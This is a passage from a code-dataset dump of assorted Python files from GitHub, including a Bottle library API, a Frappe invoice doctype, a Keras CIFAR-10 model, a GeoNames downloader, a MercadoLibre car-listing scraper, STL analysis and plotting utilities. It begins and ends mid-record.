static_file(\"index.html\",\"www\")\n\n@get(\"/isbn/\")\ndef getBookInfoByISBN(isbn): \n rst = BooksAPI.getBookInfoByISBN(isbn)\n if rst == None:\n return returnJSON(-1,\"找不到ISBN:{0}对应的图书信息。请先检查ISBN是否识别错误\".format(isbn))\n else:\n return returnJSON(0,rst)\n\n@get(\"/login\")\ndef login():\n sid = request.query.sid\n pwd = request.query.pwd\n stu = STULogin(sid,pwd)\n #\n if stu.needCaptcha():\n return returnJSON(-3,\"尝试次数太多,请稍后再试。或者前往i.xmu.edu.cn重置密码\")\n if stu.login()==None:\n data={\n \"student\" : stu.getStuInfo()\n }\n return returnJSON(0,data)\n else:\n return returnJSON(-1,stu.loginFailedReason)\n\n@get(\"/book_retrieval/\")\ndef book_retrieval(qry): \n books = br.user_search(qry)\n return returnJSON(0,books)\n\ndef load_config(path):\n f = open(path,\"r\")\n data=f.read()\n obj=json.loads(data)\n return obj\n\nif __name__ == \"__main__\": \n config_path= os.path.join(os.path.split(__file__)[0],\"../config.json\")\n config=load_config(config_path)\n br = BookRetrieval(config) \n print(\"[*] 此服务用于登陆、ISBN信息提取等...\")\n port = int(config[\"pyAddr\"].split(\":\")[-1])\n # 接口仅本机可以调用.默认为单线程\n run(host=\"localhost\", port=port)","repo_name":"vcvycy/XLibrary","sub_path":"API/py_service/StartService.py","file_name":"StartService.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38851361234","text":"'''\nExercise 2: Write another program that prompts for a list of numbers\nas above and at the end prints out both the maximum and minimum of\nthe numbers instead of the average.\n'''\nnum = \"\"\ncount = 0\ntotal = 0 \nnum_max = None\nnum_min = None\nwhile num != \"done\":\n try:\n num = input(\"Enter a number :\")\n if num == \"done\":\n break\n else:\n num = int(num)\n count = count + 1\n total = num + total\n if num_max is None:\n num_max = num\n if num_min is None:\n num_min = num\n if num > num_max:\n num_max = num\n if num < num_min:\n num_min = num\n\n except:\n print(\"Invalid Input\")\n continue\nprint(\"\\nTotal: \",total,\"\\nNumber's Count: \",count,\"\\nMax: \",num_max,\"\\nMin: \",num_min)","repo_name":"andresnunes/Projetos_Python","sub_path":"Projetos_Python/Exercicios-Livro-PythonForEverybody/5Ex2.py","file_name":"5Ex2.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1387903485","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe.model.mapper import get_mapped_doc\nfrom frappe.utils import cint, flt\nfrom frappe.utils import add_days, getdate, formatdate, get_first_day, date_diff, add_years, get_timestamp\n\nfq_status_map = {\n 0: \"Draft\",\n 1: \"Submitted\",\n 2: \"Cancelled\"\n}\n\nclass FarmerQuotation(Document):\n def validate(self):\n self.set_status_from_docStatus()\n pass\n\n def set_status_from_docStatus(self):\n if self.status != \"Promoted\":\n self.status = fq_status_map[self.docstatus or 0]\n\n@frappe.whitelist()\ndef make_purchase_invoice(source_name, target_doc=None):\n def set_missing_values(source, target):\n target.ignore_pricing_rule = 1\n set_supplier(source, target)\n target.run_method(\"set_missing_values\")\n target.run_method(\"calculate_taxes_and_totals\")\n target.save()\n source.purchase_invoice = target.name\n source.status = \"Promoted\"\n # frappe.throw((\"Due Date {0} cannot be before Posting Date {1}\").format(target.due_date, target.posting_date))\n\n source.save()\n frappe.db.commit()\n\n def set_supplier(source, target):\n farmer = frappe.get_doc(\"Farmer\", source.get('farmer'))\n\n if not frappe.db.exists('Supplier Type', 'Farmer'):\n supplier_type = frappe.new_doc('Supplier_Type')\n supplier_type.supplier_type = 'Farmer'\n supplier_type.save(ignore_permissions=True)\n frappe.db.commit()\n\n supplier = frappe.db.get_value('Supplier', {\"supplier_name\": farmer.get('title')}, [\"name\", 'supplier_name'], as_dict=1)\n\n if supplier is None:\n supplier_doc = frappe.new_doc('Supplier')\n supplier_doc.name = farmer.get('name')\n supplier_doc.supplier_name = farmer.get('title')\n supplier_doc.image = farmer.get('image')\n supplier_doc.supplier_type = 'Farmer'\n supplier_doc.supplier_details = farmer.get(\"address\")+ \"\\r\\n\"+ farmer.get('bank_account')+ \"\\r\\n\"+ farmer.get('bank_ifsc')+ \"\\r\\n\"+ farmer.get('bank_name')\n supplier_doc.save()\n frappe.db.commit()\n\n supplier = frappe.db.get_value('Supplier', {\"supplier_name\": farmer.get('title')}, [\"name\", 'supplier_name'], as_dict=1)\n\n if not frappe.db.exists('Supplier', supplier.get('name')):\n frappe.throw((\n 'Could not create supplier from farmer frappe.db.exists(\"Supplier\", ID) failed for {0}')\n .format(supplier.get('name')))\n\n credit_days_based_on, credit_days, supplier_type = \\\n frappe.db.get_value('Supplier', supplier.get('name'), [\"credit_days_based_on\", \"credit_days\", \"supplier_type\"])\n\n target.supplier = supplier.get('name')\n\n doclist = get_mapped_doc(\"Farmer Quotation\", source_name, {\n \"Farmer Quotation\": {\n \"doctype\": \"Purchase Invoice\",\n \"validation\": {\n \"docstatus\": [\"=\", 1],\n \"status\": [\"=\", \"Submitted\"],\n \"quotation_type\": [\"=\", \"Procurement\"]\n },\n \"field_map\": {\n \"transaction_date\": \"posting_date\",\n \"grand_total\": \"grand_total\",\n \"in_words\": \"in_words\",\n \"currency\": \"currency\",\n \"conversion_rate\": \"conversion_rate\",\n \"name\": \"title\"\n }\n },\n \"Farmer Quotation Item\": {\n \"doctype\": \"Purchase Invoice Item\",\n \"field_map\": {\n \"item_code\": \"item_code\",\n \"item_name\": \"item_name\",\n \"grade\": \"grade\",\n \"qty\": \"qty\",\n \"uom\": \"uom\",\n \"rate\": \"rate\",\n \"amount\": \"amount\",\n }\n }\n # ,\n # \"Sales Taxes and Charges\": {\n # \"doctype\": \"Sales Taxes and Charges\",\n # \"add_if_empty\": True\n # },\n # \"Sales Team\": {\n # \"doctype\": \"Sales Team\",\n # \"field_map\": {\n # \"incentives\": \"incentives\"\n # },\n # \"add_if_empty\": True\n # }\n }, target_doc, set_missing_values)\n\n return doclist\n","repo_name":"shahzorkhan/fpo","sub_path":"fpo/fpo/doctype/farmer_quotation/farmer_quotation.py","file_name":"farmer_quotation.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5591889281","text":"import os\nfrom lxml import etree\nfrom datetime import datetime, date\nimport pandas as pd\nimport shutil\n\ndef timestamp_naf(path_to_doc):\n \"\"\"load NAF file and extract title, publication date nd uri\"\"\"\n doc_tree = etree.parse(path_to_doc)\n root = doc_tree.getroot()\n target = root.find('nafHeader/fileDesc')\n creation_time = target.get('creationtime')\n title = target.get('title')\n target2 = root.find('nafHeader/public')\n uri = target2.get('uri')\n title_time = {'title':title, 'creation time': creation_time, 'uri':uri}\n return title_time\n\ndef timestamps_collection(collection):\n \"\"\"load collection of naf files and extract list of publication dates\"\"\"\n timestamps = []\n\n for file in collection:\n timestamp = timestamp_naf(file)\n timestamps.append(timestamp)\n return timestamps\n\ndef time_in_correct_format():\n \"Function that returns the current time (UTC)\"\n datetime_obj = datetime.now()\n return datetime_obj.strftime(\"%Y-%m-%dT%H:%M:%SUTC\")\n\ndef range_of_dates(event_date):\n \"\"\"returns a list with a range of dates between the event date and the current date\"\"\"\n bottom_date = datetime(1677,9,23)\n\n if event_date.date() < bottom_date.date():\n event_date = \"1677-09-23\"\n print('Warning: bottom value as default for this event date. Real event date not implemented in pandas time frame')\n else:\n event_date = str(event_date)[:-9]\n\n current_date = time_in_correct_format()[:-12]\n mydates = pd.date_range(event_date,current_date).tolist()\n\n range_of_dates = []\n\n for date in mydates:\n date = str(date.date())\n range_of_dates.append(date)\n return range_of_dates\n\ndef validate_publication_date(event_date, timestamps):\n \"\"\"validates whether the publication date is within the range of the event date and the current date\"\"\"\n known_dates = []\n unknown_dates = []\n\n dates = range_of_dates(event_date)\n\n for timestamp in timestamps:\n timestamp_stripped = timestamp['creation time'][:-12]\n if timestamp_stripped in dates:\n known_dates.append(timestamp)\n else:\n unknown_dates.append(timestamp)\n return known_dates, unknown_dates\n\ndef calculate_difference(list_of_timestamps, event_date):\n \"\"\"calculates the difference between the publication dates and the event date and creates new list with extended dictionaries\"\"\"\n event_date_replace = str(event_date).replace('-',',')\n event_date = event_date_replace[:10]\n event_year = int(event_date[:4])\n event_month = int(event_date[5:7])\n event_day = int(event_date[8:])\n\n known_distance = []\n\n for info in list_of_timestamps:\n timestamp = info['creation time']\n timestamp_replace = timestamp.replace('-',',')\n text_date = timestamp_replace[:10]\n text_year = int(text_date[:4])\n text_month = int(text_date[5:7])\n text_day = int(text_date[8:])\n f_date = date(event_year,event_month,event_day)\n l_date = date(text_year,text_month,text_day)\n delta = l_date - f_date\n info['historical distance'] = delta.days\n return list_of_timestamps\n\ndef categorize_in_time_buckets(known_distance,time_buckets):\n '''extend dictionary with categorization of the historical distance in time buckets'''\n\n for info in known_distance:\n for key, value in time_buckets.items():\n if info['historical distance'] in value:\n time_bucket = key\n info['time bucket'] = time_bucket\n if \"time bucket\" not in info:\n default_bucket = \"outside bucket range\"\n info['time bucket'] = default_bucket\n print(\"Warning: historical distance falls outside of time bucket range.\")\n return known_distance\n\ndef create_output_folder(output_folder,start_from_scratch):\n '''creates output folder for export dataframe'''\n folder = output_folder\n\n if os.path.isdir(folder):\n if start_from_scratch == True:\n shutil.rmtree(folder)\n\n if not os.path.isdir(folder):\n os.mkdir(folder)\n\ndef timestamps_to_format(known_timestamps,unknown_timestamps,xlsx_path,output_folder,start_from_scratch):\n \"\"\"\n lists of dictionaries to excel\n \"\"\"\n headers = ['title', 'timestamp', 'historical distance','time bucket','uri']\n\n list_of_lists = []\n\n for info in known_timestamps:\n one_row = [info['title'],info['creation time'],info['historical distance'],info['time bucket'],info['uri']]\n list_of_lists.append(one_row)\n for info in unknown_timestamps:\n a_row = [info['title'],info['creation time'], 'unknown','unknown',info['uri']]\n list_of_lists.append(a_row)\n\n df = pd.DataFrame(list_of_lists, columns=headers)\n\n if output_folder != None:\n create_output_folder(output_folder=output_folder,\n start_from_scratch=start_from_scratch)\n df.to_excel(xlsx_path, index=False)\n return df\n","repo_name":"cltl/historical_distance","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37143496377","text":"from keras.models import Model\nfrom keras.layers import Input, Dense, Conv2D, Activation, MaxPool2D, Dropout, Flatten,normalization,regularizers\n\ndef cifar10_network(input_shape=(32, 32, 3), class_num=10):\n \"\"\"CIFAR CNN\n\n Keyword Arguments:\n input_shape {tuple} -- shape of input images. Should be (32,32,3) for CIFAR\n class_num {int} -- number of classes. Shoule be 10 for CIFAR10\n\n Returns:\n model -- keras.models.Model() object\n \"\"\"\n\n im_input = Input(shape=input_shape)\n times = 0\n while times < 5:\n t = Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding='valid', data_format='channels_last')(im_input)\n t = Conv2D(filters=64, kernel_size=(3, 3), strides=(1,1), padding='valid', data_format='channels_last')(t)\n #t= normalization.BatchNormalization(epsilon=1e-06, mode=0, axis=-1, momentum=0.9, weights=None, beta_init='zero', gamma_init='one')(t)\n t = Activation('relu')(t)\n t = Dropout(rate=0.4, seed=True)(t)\n t = MaxPool2D(pool_size=(3,3), strides=(1,1), padding='valid', data_format='channels_last')(t)\n times = times + 1\n\n t = Flatten()(t)\n t = Dense(units=class_num)(t)\n output = Activation(activation='softmax')(t)\n model = Model(input=im_input, output=output)\n return model\n","repo_name":"MartinYan623/CS5242-Neural-Networks-and-Deep-Learning","sub_path":"Assignment2/Part2/source/cifar10_network.py","file_name":"cifar10_network.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13782638087","text":"\"\"\"This script downloads data and parses from geonames.org, then\nsaves it to a file for use by the History Atlas's fake data generator.\n\"\"\"\n\nfrom collections import namedtuple\nimport json\nimport os\nfrom zipfile import ZipFile\nimport requests\n\n\nGEONAMES_URL = 'https://download.geonames.org/export/dump/cities15000.zip'\nSRC_DATA_DIR = input('\\n\\nPlease enter the full path of the output directory:\\n')\nif not os.path.isdir(SRC_DATA_DIR):\n raise Exception(f'Provided path {SRC_DATA_DIR} is not a directory.')\nOUT_FILENAME = SRC_DATA_DIR + 'cities.json'\ncities = list()\nCoordinates = namedtuple('Coordinates', ['longitude', 'latitude'])\n\nupper_left_coord = Coordinates(\n # La Concepción, Chiriquí\n longitude = -82.7,\n latitude = 8.6)\nlower_right_coord = Coordinates(\n # King Edward Point\n longitude = -54.3,\n latitude = -36.5)\n\ndef is_in_box(longitude: float, latitude: float) -> bool:\n \"\"\"utility function to check if coordinates are inside the box defined \n by upper_left_coord and lower_right_coord.\"\"\"\n if longitude > upper_left_coord.longitude \\\n and longitude < lower_right_coord.longitude \\\n and latitude < upper_left_coord.latitude \\\n and latitude > lower_right_coord.latitude:\n return True\n else:\n return False\n\nCityRow = namedtuple('Row', [\n 'geoname_id',\n 'name',\n 'ascii_name',\n 'alternate_names',\n 'latitude',\n 'longitude',\n 'modification_date' # yyyy-mm-dd\n])\n\n# get the data from geonames.org\nresponse = requests.get(GEONAMES_URL)\nif not response.status_code == requests.codes.ok:\n print(response.json)\n raise Exception('Unable to get Geonames data because an exception occurred.')\n\n# write the data to a zip file\nzipfile_name = SRC_DATA_DIR + 'geonames.zip'\nwith open(zipfile_name, 'wb') as f:\n f.write(response.content)\n\n# extract the zip file to text file\nwith ZipFile(zipfile_name) as z:\n # these zip files should all just have one txt file\n textfile_name = z.extract(z.namelist()[0], path=SRC_DATA_DIR)\n\n# read and parse the text file\nwith open(textfile_name, 'r') as f:\n for line in f.readlines():\n tmp_row = line.split('\\t')\n row = CityRow(\n geoname_id = int(tmp_row[0]),\n name = tmp_row[1],\n ascii_name = tmp_row[2],\n alternate_names = tmp_row[3],\n latitude = float(tmp_row[4]),\n longitude = float(tmp_row[5]),\n modification_date = tmp_row[18])\n if is_in_box(\n longitude=row.longitude,\n latitude=row.latitude):\n cities.append({\n 'geoname_id': row.geoname_id,\n 'name': row.name,\n 'ascii_name': row.ascii_name,\n 'alternate_names': row.alternate_names,\n 'latitude': row.latitude,\n 'longitude': row.longitude,\n 'modification_date': row.modification_date\n })\n\nwith open(OUT_FILENAME, 'w') as f:\n json.dump(cities, f)\nprint(f'Finished processing {len(cities)} places.')\n","repo_name":"joshua-stauffer/thehistoryatlas","sub_path":"builder/scripts/build_geo_src.py","file_name":"build_geo_src.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"42241974429","text":"import re\nimport numpy as np\n\n\ndef load_vectors(path):\n vectors = {}\n\n with open(path, \"r\") as infile:\n infile.readline()\n\n for line in infile:\n elements = line.strip().split(\" \")\n word = elements[0]\n vector = []\n for element in elements[1:]:\n vector.append(float(element))\n\n vectors[word] = np.array(vector)\n\n return vectors\n\n\ndef clean_text(text):\n text = text.strip().lower()\n text = re.sub(\"ё\", \"е\", text)\n text = re.sub(\"[^а-я0-9a-z ]\", \" \", text)\n return \" \".join(text.split())\n\n\ndef get_words(text, min_len=0):\n text = clean_text(text)\n words = text.split()\n words = [word for word in words if len(word) >= min_len]\n return words\n\n\ndef match_with_year(start_year, user_answer):\n start_year = str(start_year)\n for word in get_words(user_answer):\n if word == start_year:\n return True\n\n return False\n\ndef match_with_answer(true_answer, user_answer):\n true_words = get_words(true_answer, 2)\n user_words = get_words(user_answer, 2)\n\n # logic depends on number of words\n if len(user_words) == 0:\n return False\n\n if len(true_words) == 1:\n return true_words[0] in user_words\n\n # Process special case with one user word\n if len(user_words) == 1:\n if len(true_words) == 1:\n return user_words[0] == true_words[0]\n return False\n\n # check if all words from true_answer in user_answer\n if sum([word in user_words for word in true_words]) == len(true_words):\n return True\n\n # get all user bi-grams\n user_bigrams = [\"_\".join((user_words[i], user_words[i + 1])) for i in range(len(user_words) - 1)]\n true_bigrams = [\"_\".join((true_words[i], true_words[i + 1])) for i in range(len(true_words) - 1)]\n\n # if at least one bigram in common return True\n for user_bigram in user_bigrams:\n if user_bigram in true_bigrams:\n return True\n\n # in all other cases return False\n return False\n\ndef matching(true_answer, user_answer):\n n = 2\n\n final_answer = False\n\n true_words = get_words(true_answer)\n user_words = get_words(user_answer)\n\n if len(user_words) == 0:\n return False\n\n if n > len(user_words):\n n = len(user_words)\n\n if n > 1:\n for i in range(len(true_words) - 1):\n for j in range(len(user_words) - 1):\n if (true_words[i] == user_words[j]) and (true_words[i + 1] == user_words[j + 1]):\n final_answer = True\n else:\n if true_words[0] == user_words[0]:\n final_answer = True\n\n return final_answer\n\n\ndef calc_vector_len(vector):\n return np.sqrt(np.sum(vector * vector))\n\n\ndef middle_vector(a, vectors):\n result = np.zeros(300)\n\n words = get_words(a)\n number = 0\n\n for n in range(len(words)):\n word = words[n]\n if word in vectors:\n result = vectors[word] + result\n number += 1\n\n if number > 0:\n result /= number\n\n return result\n\n\ndef calc_vectors_score(first, second, vectors):\n a = middle_vector(first, vectors)\n b = middle_vector(second, vectors)\n\n score = np.sum(a * b) / calc_vector_len(a) / calc_vector_len(b)\n return score\n","repo_name":"sofialyubina/history","sub_path":"history/algorithms/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21957887027","text":"import requests\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport os.path\nimport re\nimport json\n\ndomain = 'https://autos.mercadolibre.com.ar/'\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/50.0.2661.102 Safari/537.36'}\n\nresponse = requests.get(domain, headers=headers)\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\n'''while para crear el array con los links de todas las páginas'''\n\nk = 97\nlinks_paginas = ['https://autos.mercadolibre.com.ar/', 'https://autos.mercadolibre.com.ar/_Desde_49']\n\nwhile k <= 1969:\n links_paginas += ['https://autos.mercadolibre.com.ar/_Desde_' + str(k)]\n k = k + 48\n\n'''for para recorrer todas las paginas de autos'''\n\nj = 0\n\nfor j in range(0, len(links_paginas)):\n url = links_paginas[j]\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n '''obtengo los links de las publaciones que hay por cada pagina'''\n\n links_pubs = []\n\n for i in range(892, len(soup.findAll('a'))):\n tag = soup.findAll('a')[i]\n href = tag['href']\n if '/MLA-' in href:\n links_pubs += [href]\n\n links_per_page = []\n\n for i in links_pubs:\n if i not in links_per_page:\n links_per_page.append(i)\n\n '''for para recorrer todas las publicaciones dentro de una pagina'''\n\n u = 0\n\n for u in range(0, len(links_per_page)):\n url_public = links_per_page[u]\n print(url_public)\n response = requests.get(url_public, headers=headers)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n '''obtengo el ID de la publicacion en la que me encuentro'''\n\n url_public_str = str(url_public)\n ides = re.findall('\\d+', url_public_str)\n ides = list(map(int, ides))\n ID = max(ides)\n\n '''obtengo los datos del vehiculo'''\n\n datos_vehiculo = {}\n campos = []\n\n for li_tag in soup.findAll('ul', {'class': 'specs-list'}):\n for span_tag in li_tag.find_all('li'):\n value = span_tag.find('span').text\n field = span_tag.find('strong').text\n campos += [field]\n if value != '':\n datos_vehiculo[field] = value\n\n '''obtengo la marca y modelo del vehiculo'''\n\n tag = []\n\n for i in range(17, 18):\n tag = soup.findAll('p')[i].text.replace(' ', '').split('|', 2)\n\n datos_vehiculo['Marca'] = tag[0]\n datos_vehiculo['Modelo'] = tag[1]\n marca = tag[0]\n\n path = './download/ml/' + str(marca).lower().replace(' ', '-') + '/' + str(ID) + '/'\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n '''funcion para crear archivos json'''\n\n def writetojsonfile(path, data):\n filepathnamewext = path + 'meta.json'\n with open(filepathnamewext, 'w') as fp:\n json.dump(data, fp)\n\n '''creo el archivo .json con las características del vehiculo'''\n\n writetojsonfile('./download/ml/' + str(marca).lower().replace(' ', '-') + '/' + str(ID) + '/', datos_vehiculo)\n\n print(\"Creado meta.json\")\n\n '''obtengo los links de las imagenes de la publicacion en la que me encuentro'''\n\n q = 0\n imagenes = []\n\n for i in range(0, len(soup.findAll('img'))):\n tag = soup.findAll('img')[i]\n if tag.get('data-srcset') is not None:\n image = tag.get('data-srcset').replace(' 2x', '').replace('webp', 'jpg')\n imagenes += [image]\n q = q + 1\n\n y = 0\n\n while y < q:\n try:\n urllib.request.urlretrieve(imagenes[y], './download/ml/' + str(marca).lower().replace(' ', '-') + '/' + str(ID) + '/' + str(marca).lower() + '_' + str(ID) + '_' + str(y + 1) + '.jpg')\n print(\"Descargada la imagen\", y + 1, \"de la publicacion\", u + 1, \"de la pagina\", j + 1)\n except Exception as e:\n print(str(e), imagenes[y])\n\n y = y + 1\n\nprint(\"End\")\n","repo_name":"antunezJoa/scriptml","sub_path":"ml3.py","file_name":"ml3.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30702565759","text":"import numpy as np\nimport trimesh\nimport os\nimport sys\nfrom check import check\nimport gc \nimport argparse\nimport git\nimport time\nimport datetime \n\ntimes = []\n\ndef run(args,filepath,filename,report,d,failed,f):\n d+=1\n report.append('')\n start_time = time.time()\n #t = datetime.timedelta(seconds=time.time())\n # get total seconds?\n report,d,failed = check(args,filepath,filename,report,d,failed)\n print(report[d],file=f)\n gc.collect()\n #t.seconds-=time.time()\n #times.append(t.total_seconds())\n times.append((time.time()-start_time))\n return d\n\nparser = argparse.ArgumentParser(prog=\"analysis.py\",\n description=\"Detects if voids are present in given STL files\",\n )\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-d','--directory',help=\"specify directory to analyze\",action='store_true')\ngroup.add_argument('-f','--file',help=\"specify file to analyze\",action='store_true')\nparser.add_argument('filenameOrPath',action='store')\nparser.add_argument('-i','--info',help=\"provide amount of void in each shell (longer report)\",action='store_true')\nargs = parser.parse_args()\n\nif args.directory:\n filepath = args.filenameOrPath\nif args.file:\n filename = args.filenameOrPath\n\n# setup report string\nif args.info:\n report = ['file,num_shells,shell_num,shell_amt_void,enclosures,has_hidden_void,void_num,center_mass,bounds']\nelif not args.info:\n report = ['file,has_hidden_void,void_num,center_mass,bounds,Risk Factor'] \nfailed=[]\n# d for design number\nvf=input('running on v or f data set? ')\nlim = int(input('please provide input limit for data set: '))\nwhile lim<0 or type(lim)!=int or vf not in ['v','f','V','F']:\n vf=input('running on v or f data set? ')\n lim = int(input('please provide input limit for data set: '))\n\nd=0\nf=open(f'report_{vf}_{lim}.csv','w')\nprint(report[d],file=f)\nif args.directory:\n # if filepath=='STL-3D-CAD-dataset':\n # https://stackoverflow.com/a/15315667\n # g = git.cmd.Git(filepath)\n # g.pull()\n # https://stackoverflow.com/a/53432676\n for filename in os.listdir(filepath):\n if filename.lower().endswith('.stl'): # .lower() because .STL is possible\n d=run(args,filepath,filename,report,d,failed,f)\n print(\"done\")\n\nif args.file:\n d=run(args,None,filename,report,d,failed,f)\n print(\"done\")\n\nf.close()\nt=open(f'times_{vf}_{lim}.csv','w')\nfor time in times:\n print(str(time),file=t)\nt.close()\n","repo_name":"chamathg21/STL-3D-CAD-dataset","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10302520361","text":"\"\"\"\nThis moduel contains all the plots produced from the package.\n\"\"\"\nimport argparse\nimport os\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport torch\nfrom sklearn.metrics import confusion_matrix\nfrom tqdm import tqdm\nimport cv2\nimport pandas as pd\nfrom e2evideo import our_utils\n\n\ndevice = our_utils.get_device()\n\n\ndef plot_cae_training(data, network, color_channels=3):\n \"\"\"\n Plot the CAE training results, it results in plotting the original Vs.\n reconstruced image.\n \"\"\"\n video_number = 0\n for visual_images in tqdm(data):\n frame_number = 0\n # sending test images to device\n visual_images = visual_images.to(device)\n visual_images = visual_images.squeeze(axis=0)\n print(visual_images.shape)\n with torch.no_grad():\n # reconstructing test images\n reconstructed_imgs = network(visual_images)\n print(reconstructed_imgs.shape)\n # sending reconstructed and images to cpu to allow for visualization\n reconstructed_imgs = reconstructed_imgs.cpu()\n visual_images = visual_images.cpu()\n # plotting original and reconstructed images\n for image_o, image_r in zip(visual_images, reconstructed_imgs):\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.suptitle(\"Original/Reconstructed\")\n if color_channels == 1:\n ax2.imshow(image_r.reshape(60, 60, color_channels), cmap=\"gray\")\n else:\n ax2.imshow(image_r.reshape(60, 60, color_channels))\n ax1.imshow(image_o.squeeze())\n for ax_ in [ax1, ax2]:\n ax_.axis(\"off\")\n path_ = \"./results/feature_extractor/cae_\"\n file_name = path_ + str(video_number) + \"-\" + str(frame_number) + \".jpg\"\n frame_number += 1\n plt.savefig(file_name)\n plt.show()\n plt.close()\n video_number += 1\n break\n\n\ndef plot_ucf101(label_data):\n \"\"\"\n This function is used to plot the UCF101 dataset.\n \"\"\"\n # Create a Matplotlib figure\n plt.figure(figsize=(30, 30))\n\n # Get Names of all classes in UCF101\n all_classes_names = label_data.labels.values\n\n # Generate a random sample of images each time the cell runs\n random_range = random.sample(range(len(all_classes_names[0:10])), 8)\n\n # Iterating through all the random samples\n for counter, random_index in enumerate(random_range, 1):\n # Getting Class Name using Random Index\n selected_class_name = all_classes_names[random_index]\n\n # Getting a list of all the video files present in a Class Directory\n video_files_names_list = os.listdir(f\"../data/UCF-101/{selected_class_name}\")\n\n # Randomly selecting a video file\n selected_video_file_name = random.choice(video_files_names_list)\n\n # Reading the Video File Using the Video Capture\n video_file = f\"../data/UCF-101/{selected_class_name}/{selected_video_file_name}\"\n # pylint: disable=no-member\n video_reader = cv2.VideoCapture(video_file)\n # Reading The First Frame of the Video File\n _, bgr_frame = video_reader.read()\n\n # Closing the VideoCapture object and releasing all resources.\n video_reader.release()\n\n # Converting the BGR Frame to RGB Frame\n rgb_frame = cv2.cvtColor(bgr_frame, cv2.COLOR_BGR2RGB)\n\n # Adding The Class Name Text on top of the Video Frame.\n\n cv2.rectangle(rgb_frame, (30, 200), (290, 240), (255, 255, 255), -1)\n cv2.putText(\n rgb_frame,\n selected_class_name,\n (30, 230),\n cv2.FONT_HERSHEY_SIMPLEX,\n 1,\n (160, 32, 240),\n 2,\n cv2.LINE_AA,\n )\n cv2.rectangle(rgb_frame, (1, 1), (320, 240), (160, 32, 240), 10)\n # Assigning the Frame to a specific position of a subplot\n plt.subplot(5, 4, counter)\n plt.imshow(rgb_frame)\n plt.axis(\"off\")\n # save image to a file\n plt.savefig(\"./results/ucf101.jpg\")\n print(\"image saved to file\")\n\n\ndef plot_accuracy(history):\n \"\"\"\n This function is used to plot the accuracy of the model.\n \"\"\"\n # Plot the graph to check training and testing accuracy over the period of time\n plt.figure(figsize=(13, 5))\n plt.title(\"Accuracy vs Epochs\")\n plt.plot(history.history[\"accuracy\"], label=\"Train Accuracy\")\n plt.plot(history.history[\"val_accuracy\"], label=\"Validation Accuracy\")\n plt.legend(loc=\"best\")\n plt.savefig(\"./results/accuracy_vs_epochs.png\")\n plt.show()\n\n\ndef plot_confusion_matrix(y_test, predicted_classes):\n \"\"\"\n This function is used to plot the confusion matrix of the model.\n \"\"\"\n # Confusion Matrix\n plt.figure(figsize=(10, 10))\n plt.title(\"Confusion matrix\")\n cm_ = confusion_matrix(y_test, predicted_classes)\n sns.heatmap(cm_, annot=True, fmt=\"d\", cmap=\"coolwarm\")\n plt.savefig(\"./results/confusion_matrix.png\", bbox_inches=\"tight\")\n\n\ndef plot_predictions(test_images, predicted_classes, actual_classes):\n \"\"\"\n This function is used to plot the predictions of the model.\n \"\"\"\n # Create a Matplotlib figure\n plt.figure(figsize=(7, 7))\n counter = 1\n lables = [\n predicted_classes[i : i + 32] for i in range(0, len(predicted_classes), 32)\n ]\n actual_classes = [\n actual_classes[i : i + 32] for i in range(0, len(actual_classes), 32)\n ]\n print(\"\\n \\n\")\n print(\"Predicted Classes\")\n print(lables)\n print(\"\\n \\n\")\n print(\"Actual Classes\")\n print(actual_classes)\n print(\"\\n \\n\")\n\n label_data = pd.read_csv(\n \"../data/UCF-101/ucfTrainTestlist/classInd.txt\",\n sep=\" \",\n header=None,\n engine=\"pyarrow\",\n )\n label_data.columns = [\"index\", \"labels\"]\n\n for index, video in enumerate(test_images):\n frame = video[0, 0, :, :, :]\n plt.subplot(1, 3, counter)\n frame_resize = cv2.resize(frame, (60, 60)) # pylint: disable=no-member\n plt.imshow(frame_resize)\n plt.text(\n 10,\n 30,\n label_data.labels.values[lables[index][0]],\n style=\"italic\",\n bbox={\"facecolor\": \"purple\", \"alpha\": 0.7, \"pad\": 10},\n )\n plt.text(\n 10,\n 500,\n label_data.labels.values[actual_classes[index][0]],\n style=\"italic\",\n bbox={\"facecolor\": \"green\", \"alpha\": 0.7, \"pad\": 10},\n )\n counter += 1\n plt.axis(\"off\")\n plt.savefig(\"./results/predictions.jpg\", bbox_inches=\"tight\")\n print(\"\\n \\n\")\n print(\"Done\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--data_frame\")\n 